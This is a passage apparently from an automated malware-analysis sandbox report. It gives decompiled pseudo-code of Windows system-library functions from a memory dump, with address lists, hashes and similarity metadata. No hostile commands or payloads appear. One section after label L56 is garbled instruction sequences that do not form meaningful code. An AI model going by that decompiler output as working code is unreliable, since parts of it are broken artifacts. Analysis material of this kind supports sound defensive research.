					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E01007D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E010B8F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E0102AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x10d8628; // 0x0
								_v68 = _t77;
								_t78 =  *0x10d862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x10d8628; // 0x0
							_t116 =  *0x10d862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}

0x0100b94c
0x0100b956
0x0100b95c
0x0100b95e
0x0100b964
0x0100b969
0x0100b96d
0x0100b96d
0x0100b970
0x0100b974
0x0100b97a
0x0100badf
0x0100badf
0x0100bae2
0x0100bae4
0x0100bae6
0x0100baf0
0x01052cb8
0x0100baf6
0x0100baf6
0x0100baf6
0x0100bafd
0x0100bb1f
0x0100bb1f
0x0100baff
0x0100bb00
0x0100bb00
0x0100bb03
0x0100bb03
0x0100bacb
0x0100bacf
0x0100bad0
0x0100bad1
0x0100badc
0x0100badc
0x0100b980
0x0100b980
0x0100b988
0x0100b98b
0x0100b98d
0x0100b990
0x0100b993
0x0100b999
0x0100b99b
0x0100b9a1
0x0100b9a5
0x0100b9aa
0x0100b9b0
0x0100b9bb
0x0100b9c0
0x0100b9c3
0x0100b9ca
0x0100b9cc
0x0100b9cf
0x0100b9d3
0x0100b9d7
0x0100ba94
0x0100ba94
0x0100ba98
0x0100baa3
0x01052ccb
0x0100baa9
0x0100baa9
0x0100baa9
0x0100bab1
0x01052cd5
0x01052cdd
0x01052cdd
0x0100babb
0x0100babc
0x0100bac2
0x0100bac3
0x0100bac3
0x0100bac6
0x00000000
0x0100b9dd
0x0100b9dd
0x0100b9e7
0x0100b9e7
0x0100b9ec
0x0100b9ec
0x0100b9f1
0x0100b9f5
0x0100b9fa
0x0100ba00
0x0100ba0c
0x0100ba10
0x0100ba10
0x0100ba12
0x0100ba18
0x00000000
0x00000000
0x0100bb26
0x0100bb26
0x0100ba1e
0x0100ba1e
0x0100ba23
0x0100ba25
0x0100ba2c
0x0100ba30
0x0100ba35
0x0100ba35
0x0100ba41
0x0100ba46
0x0100ba4c
0x0100ba50
0x0100ba54
0x0100ba6a
0x0100ba6e
0x0100ba70
0x0100ba74
0x0100ba78
0x0100ba7a
0x0100ba7c
0x0100ba8e
0x0100ba90
0x0100ba92
0x0100bb14
0x0100bb14
0x0100bb16
0x0100bb16
0x00000000
0x0100ba7c
0x0100bb0a
0x0100bb0d
0x00000000
0x00000000
0x00000000
0x0100bb0f

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0100B9A5

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 885266447-0
Opcode ID: 901157f6889ccdb7074be568850ac79e3644e97e4f966d820bba2c0a64d5a5cf
Instruction ID: d3b2efc54865fe87708270c9f371d02c2dec173c6a7fff52a2a66bd7aa80037b
Opcode Fuzzy Hash: 901157f6889ccdb7074be568850ac79e3644e97e4f966d820bba2c0a64d5a5cf
Instruction Fuzzy Hash: C6517775A08701CFE762CF6CC08092BBBE5FB88610F1489AEE9D587395D771E840CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00FEB171, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00FEB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x10bf7a8);
				E0103D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E0103D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E0102D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E0102F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L0103DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E0102B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E0102B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E0102E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E0102A890() != 0) {
					goto L6;
				}
				goto L3;
			}

0x00feb171
0x00feb171
0x00feb171
0x00feb171
0x00feb171
0x00feb176
0x00feb17b
0x00feb180
0x00feb186
0x00feb18f
0x00feb198
0x00feb1a4
0x00feb1aa
0x01044802
0x01044802
0x01044805
0x0104480c
0x0104480e
0x00feb1d1
0x00feb1d3
0x00feb1de
0x00feb1de
0x01044817
0x0104481e
0x01044820
0x01044822
0x01044822
0x01044824
0x01044824
0x0104482a
0x00000000
0x00000000
0x01044835
0x0104483a
0x0104483d
0x0104483f
0x01044842
0x01044842
0x01044842
0x01044846
0x0104484c
0x0104484e
0x01044851
0x01044851
0x01044853
0x01044854
0x01044854
0x01044858
0x0104485a
0x0104485a
0x0104485d
0x0104485f
0x01044861
0x01044861
0x01044866
0x0104486b
0x0104486e
0x01044871
0x01044876
0x01044876
0x01044878
0x0104487b
0x01044884
0x01044884
0x00000000
0x0104487d
0x0104487d
0x01044882
0x01044889
0x01044889
0x0104488f
0x01044891
0x010448e0
0x010448e2
0x010448e4
0x010448e4
0x010448e7
0x010448e7
0x010448ed
0x010448f4
0x010448f6
0x01044951
0x01044951
0x01044953
0x01044953
0x01044956
0x01044956
0x01044958
0x01044959
0x01044959
0x0104495d
0x0104495d
0x0104495f
0x0104495f
0x01044965
0x01044969
0x010449ba
0x010449ba
0x010449c1
0x010449c5
0x010449cc
0x010449d4
0x010449d7
0x010449da
0x010449e4
0x010449e5
0x010449f3
0x01044a02
0x00000000
0x01044a02
0x01044972
0x01044974
0x00000000
0x00000000
0x01044976
0x01044979
0x01044982
0x01044983
0x01044984
0x0104498b
0x0104498d
0x01044991
0x01044993
0x01044999
0x0104499d
0x010449a2
0x010449a2
0x010449a2
0x01044999
0x010449ac
0x00000000
0x010449b3
0x010448f8
0x010448fe
0x00000000
0x00000000
0x00000000
0x010448fe
0x01044895
0x0104489c
0x010448ad
0x010448b2
0x010448b5
0x010448b7
0x010448ba
0x010448bc
0x010448c6
0x010448c6
0x010448cb
0x010448d1
0x010448d4
0x010448d8
0x010448d8
0x00000000
0x010448d8
0x010448be
0x010448c0
0x00000000
0x00000000
0x010448c2
0x00000000
0x00000000
0x00000000
0x010448c4
0x00000000
0x01044882
0x0104487b
0x01044904
0x01044906
0x00000000
0x00000000
0x01044908
0x0104490e
0x00000000
0x00000000
0x01044910
0x01044917
0x01044917
0x00000000
0x01044917
0x00feb1ba
0x010447f9
0x010447fc
0x00000000
0x00000000
0x00000000
0x010447fc
0x00feb1c0
0x00feb1c0
0x00feb1c3
0x00feb1cb
0x00000000
0x00000000
0x00000000

APIs

_vswprintf_s.LIBCMT ref: 010448AD

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID: _vswprintf_s
String ID:
API String ID: 677850445-0
Opcode ID: e346a7ca70ff01a1c50556dfe842666dd085ca19d6d0a65f7a4934cc806d6810
Instruction ID: 4acca2f3dfe0f84f097eef1dd9c31b29ab7f904f08ccaccfe8415c9ac5a8e1fd
Opcode Fuzzy Hash: e346a7ca70ff01a1c50556dfe842666dd085ca19d6d0a65f7a4934cc806d6810
Instruction Fuzzy Hash: 2A51C1B5D0025A8BEB21CF688885BAEBBF0BF00714F2041BDD899EB282D7754D45DB91

Uniqueness

Uniqueness Score: -1.00%

Function 01012581, Relevance: 1.6, Strings: 1, Instructions: 329
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E01012581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, char _a1546911997) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				void* _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t233;
				signed int _t237;
				void* _t238;
				void* _t239;
				signed int _t243;
				signed int _t245;
				intOrPtr _t247;
				signed int _t250;
				signed int _t257;
				signed int _t260;
				signed int _t268;
				intOrPtr _t274;
				signed int _t276;
				signed int _t278;
				void* _t279;
				signed int _t280;
				unsigned int _t283;
				signed int _t287;
				intOrPtr* _t288;
				signed int _t289;
				signed int _t293;
				intOrPtr _t305;
				signed int _t314;
				signed int _t316;
				signed int _t317;
				signed int _t321;
				signed int _t322;
				void* _t324;
				signed int _t325;
				signed int _t327;
				signed int _t330;
				void* _t331;
				void* _t333;

				_t327 = _t330;
				_t331 = _t330 - 0x4c;
				_v8 =  *0x10dd360 ^ _t327;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t321 = 0x10db2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t283 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t333 = (_v24 >> 0x0000001c & 0x00000003) - 1;
				_t274 = 0x48;
				_t303 = 0 | _t333 == 0x00000000;
				_t314 = 0;
				_v37 = _t333 == 0;
				if(_v48 <= 0) {
					L16:
					_t45 = _t274 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t322 = 0xc0000106;
						goto L32;
					} else {
						_t321 = L01004620(_t283,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t274);
						_v52 = _t321;
						__eflags = _t321;
						if(_t321 == 0) {
							_t322 = 0xc0000017;
							goto L32;
						} else {
							 *(_t321 + 0x44) =  *(_t321 + 0x44) & 0x00000000;
							_t50 = _t321 + 0x48; // 0x48
							_t316 = _t50;
							_t303 = _v32;
							 *((intOrPtr*)(_t321 + 0x3c)) = _t274;
							_t276 = 0;
							 *((short*)(_t321 + 0x30)) = _v48;
							__eflags = _t303;
							if(_t303 != 0) {
								 *(_t321 + 0x18) = _t316;
								__eflags = _t303 - 0x10d8478;
								 *_t321 = ((0 | _t303 == 0x010d8478) - 0x00000001 & 0xfffffffb) + 7;
								E0102F3E0(_t316,  *((intOrPtr*)(_t303 + 4)),  *_t303 & 0x0000ffff);
								_t303 = _v32;
								_t331 = _t331 + 0xc;
								_t276 = 1;
								__eflags = _a8;
								_t316 = _t316 + (( *_t303 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t268 = E010739F2(_t316);
									_t303 = _v32;
									_t316 = _t268;
								}
							}
							_t287 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t322 = _v68;
								__eflags = 0;
								 *((short*)(_t316 - 2)) = 0;
								goto L32;
							} else {
								_t278 = _t321 + _t276 * 4;
								_v56 = _t278;
								do {
									__eflags = _t303;
									if(_t303 != 0) {
										_t233 =  *(_v60 + _t287 * 4);
										__eflags = _t233;
										if(_t233 == 0) {
											goto L30;
										} else {
											__eflags = _t233 == 5;
											if(_t233 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t278 =  *(_v60 + _t287 * 4);
										 *(_t278 + 0x18) = _t316;
										_t237 =  *(_v60 + _t287 * 4);
										__eflags = _t237 - 8;
										if(_t237 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t237 * 4 +  &M01012959))) {
												case 0:
													__ax =  *0x10d8488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E0102F3E0(__edi,  *0x10d848c, __ax & 0x0000ffff);
														__eax =  *0x10d8488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E0102F3E0(_t316, _v80, _v64);
													_t263 = _v64;
													goto L26;
												case 2:
													 *0x10d8480 & 0x0000ffff = E0102F3E0(__edi,  *0x10d8484,  *0x10d8480 & 0x0000ffff);
													__eax =  *0x10d8480 & 0x0000ffff;
													__eax = ( *0x10d8480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E0102F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E0102F3E0(_t316, _v76, _v36);
														_t263 = _v36;
													}
													L26:
													_t331 = _t331 + 0xc;
													_t316 = _t316 + (_t263 >> 1) * 2 + 2;
													__eflags = _t316;
													L27:
													_push(0x3b);
													_pop(_t265);
													 *((short*)(_t316 - 2)) = _t265;
													goto L28;
												case 6:
													__ebx =  *0x10d575c;
													__eflags = __ebx - 0x10d575c;
													if(__ebx != 0x10d575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E0102F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x10d575c;
														} while (__ebx != 0x10d575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x10d8478 & 0x0000ffff = E0102F3E0(__edi,  *0x10d847c,  *0x10d8478 & 0x0000ffff);
													__eax =  *0x10d8478 & 0x0000ffff;
													__eax = ( *0x10d8478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E010739F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x10d6e58 & 0x0000ffff = E0102F3E0(__edi,  *0x10d6e5c,  *0x10d6e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x10d6e58 & 0x0000ffff;
													__eax = ( *0x10d6e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t287 = _v16;
													_t303 = _v32;
													L29:
													_t278 = _t278 + 4;
													__eflags = _t278;
													_v56 = _t278;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t287 = _t287 + 1;
									_v16 = _t287;
									__eflags = _t287 - _v48;
								} while (_t287 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t237 =  *(_v60 + _t314 * 4);
						if(_t237 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t237 * 4 +  &M01012935))) {
							case 0:
								__ax =  *0x10d8488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t303 =  &_v64;
								_v80 = E01012E3E(0,  &_v64);
								_t274 = _t274 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x10d8480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x10d8480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E00FFEEF0(0x10d79a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E00FFEB70(__ecx, 0x10d79a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t211 = _v72;
											__eflags = _t211;
											if(_t211 != 0) {
												L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t211);
											}
											_t212 = _v52;
											__eflags = _t212;
											if(_t212 != 0) {
												__eflags = _t322;
												if(_t322 < 0) {
													L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t212);
													_t212 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t283 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x10d7b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L01004620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E00FFEB70(__ecx, 0x10d79a0);
										__eax = _v52;
										L36:
										_pop(_t315);
										_pop(_t323);
										__eflags = _v8 ^ _t327;
										_pop(_t275);
										return E0102B640(_t212, _t275, _v8 ^ _t327, _t303, _t315, _t323);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t270 = _v56;
								if(_v56 != 0) {
									_t303 =  &_v36;
									_t272 = E01012E3E(_t270,  &_v36);
									_t283 = _v36;
									_v76 = _t272;
								}
								if(_t283 == 0) {
									goto L44;
								} else {
									_t274 = _t274 + 2 + _t283;
								}
								goto L14;
							case 6:
								__eax =  *0x10d5764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x10d8478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x10d8478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x10d6e58 & 0x0000ffff;
								__eax = ( *0x10d6e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t314 = _t314 + 1;
								if(_t314 >= _v48) {
									goto L16;
								} else {
									_t303 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_t288 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					 *_t288 =  *_t288 + _t237;
					asm("o16 sub [ecx], al");
					_t238 = _t237 + _t331;
					asm("daa");
					 *_t288 =  *_t288 + _t238;
					 *[es:ecx] =  *[es:ecx] + _t238;
					_t324 = _t321 + 1;
					 *_t288 =  *_t288 - _t238;
					 *0x1f010126 =  *0x1f010126 + _t238;
					_pop(_t279);
					_t239 = _t238 + 0x1289401;
					 *0x201055b =  *0x201055b + _t324;
					 *_t288 =  *_t288 - _t239;
					 *((intOrPtr*)(_t239 - 0x9fefed8)) =  *((intOrPtr*)(_t239 - 0x9fefed8)) + _t239;
					asm("daa");
					 *_t288 =  *_t288 + _t239;
					_push(ds);
					 *_t288 =  *_t288 - _t239;
					 *((intOrPtr*)(_t324 + 0x28)) =  *((intOrPtr*)(_t324 + 0x28)) + _t288;
					 *_t288 =  *_t288 + _t239;
					asm("daa");
					 *_t288 =  *_t288 + _t239;
					asm("fcomp dword [ebx+0x5]");
					 *((intOrPtr*)(_t239 +  &_a1546911997)) =  *((intOrPtr*)(_t239 +  &_a1546911997)) + _t324;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x10bff00);
					E0103D08C(_t279, _t316, _t324);
					_v44 =  *[fs:0x18];
					_t317 = 0;
					 *_a24 = 0;
					_t280 = _a12;
					__eflags = _t280;
					if(_t280 == 0) {
						_t243 = 0xc0000100;
					} else {
						_v8 = 0;
						_t325 = 0xc0000100;
						_v52 = 0xc0000100;
						_t245 = 4;
						while(1) {
							_v40 = _t245;
							__eflags = _t245;
							if(_t245 == 0) {
								break;
							}
							_t293 = _t245 * 0xc;
							_v48 = _t293;
							__eflags = _t280 -  *((intOrPtr*)(_t293 + 0xfc1664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t260 = E0102E5C0(_a8,  *((intOrPtr*)(_t293 + 0xfc1668)), _t280);
									_t331 = _t331 + 0xc;
									__eflags = _t260;
									if(__eflags == 0) {
										_t325 = E010651BE(_t280,  *((intOrPtr*)(_v48 + 0xfc166c)), _a16, _t317, _t325, __eflags, _a20, _a24);
										_v52 = _t325;
										break;
									} else {
										_t245 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t245 = _t245 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t325;
						__eflags = _t325;
						if(_t325 < 0) {
							__eflags = _t325 - 0xc0000100;
							if(_t325 == 0xc0000100) {
								_t289 = _a4;
								__eflags = _t289;
								if(_t289 != 0) {
									_v36 = _t289;
									__eflags =  *_t289 - _t317;
									if( *_t289 == _t317) {
										_t325 = 0xc0000100;
										goto L76;
									} else {
										_t305 =  *((intOrPtr*)(_v44 + 0x30));
										_t247 =  *((intOrPtr*)(_t305 + 0x10));
										__eflags =  *((intOrPtr*)(_t247 + 0x48)) - _t289;
										if( *((intOrPtr*)(_t247 + 0x48)) == _t289) {
											__eflags =  *(_t305 + 0x1c);
											if( *(_t305 + 0x1c) == 0) {
												L106:
												_t325 = E01012AE4( &_v36, _a8, _t280, _a16, _a20, _a24);
												_v32 = _t325;
												__eflags = _t325 - 0xc0000100;
												if(_t325 != 0xc0000100) {
													goto L69;
												} else {
													_t317 = 1;
													_t289 = _v36;
													goto L75;
												}
											} else {
												_t250 = E00FF6600( *(_t305 + 0x1c));
												__eflags = _t250;
